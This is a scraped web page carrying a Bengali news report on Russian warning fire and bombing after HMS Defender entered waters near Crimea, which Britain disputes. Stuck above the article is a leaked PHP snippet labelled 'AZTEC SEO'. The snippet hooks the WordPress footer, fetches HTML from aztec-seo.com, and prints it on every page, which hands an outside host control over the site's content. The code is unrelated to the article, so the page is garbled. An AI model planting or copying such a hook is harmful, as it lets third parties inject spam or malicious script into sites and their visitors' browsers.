/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
রুশ জঙ্গিবিমানের বোমাবর্ষণ ও যুদ্ধহাজাজের সতর্কতামূলক গুলির পর রুশ পানিসীমা থেকে পালিয়েছে ব্রিটিশ যুদ্ধজাহাজ। রুশ প্রতিরক্ষা মন্ত্রণালয় বলেছে, ব্রিটিশ ‘এইচএমএস ডিফেন্ডার’ জাহাজটি ক্রিমিয়ার কাছকাছি রুশ পানিসীমায় প্রবেশ করার পর সতর্কতামূলক গুলি ও বোমা ছোড়া হয়।
তবে রুশ পানিসীমা লঙ্ঘনের অভিযোগ নাকচ করেছে ব্রিটেন।
রাশিয়া বলেছে, আজ বুধবার কৃষ্ণ সাগরে তাদের পানিসীমায় ব্রিটিশ যুদ্ধ জাহাজের অবস্থান শনাক্ত করার পর কয়েক দফা ফাঁকা গুলি ছুড়ে সতর্কবার্তা দেয় সেখানে টহলে থাকা রুশ জাহাজ। কিছুক্ষণের মধ্যে যুক্ত হয় মস্কোর যুদ্ধ বিমান। যুদ্ধবিমান থেকে বোমাও ফেলা হয়। এ ঘটনাকে কেন্দ্র করে দু’দেশের মধ্যে উত্তপ্ত পরিস্থিতি সৃষ্টি হয়েছে।
সতর্কতামূলক গুলি ও বোমার পরে এইচএমএস ডিফেন্ডার গতিপথ পরিবর্তন করে ওই পানিসীমা ত্যাগ করেছে বলে জানায় মস্কো। খবরে বলা হয়েছে, ক্রিমিয়ার দক্ষিণে কেপ ফায়োলেন্টের কাছে ঘটনাটি ঘটে। একটি টহল জাহাজ দু’বার গুলি চালায় এবং এসইউ ২৪-এম জেটটি সেখানে চারটি বোমা ফেলে।
ইন্টারফেক্স নিউজ এজেন্সি জানিয়েছে,পানিসীমা লঙ্ঘনের প্রতিবাদ জানাতে ব্রিটিশ দূতাবাসের প্রতিরক্ষা বিষয়ক কর্মকর্তাকে তলব করেছে রাশিয়ার প্রতিরক্ষা মন্ত্রণালয়। সূত্র : পার্সটুডে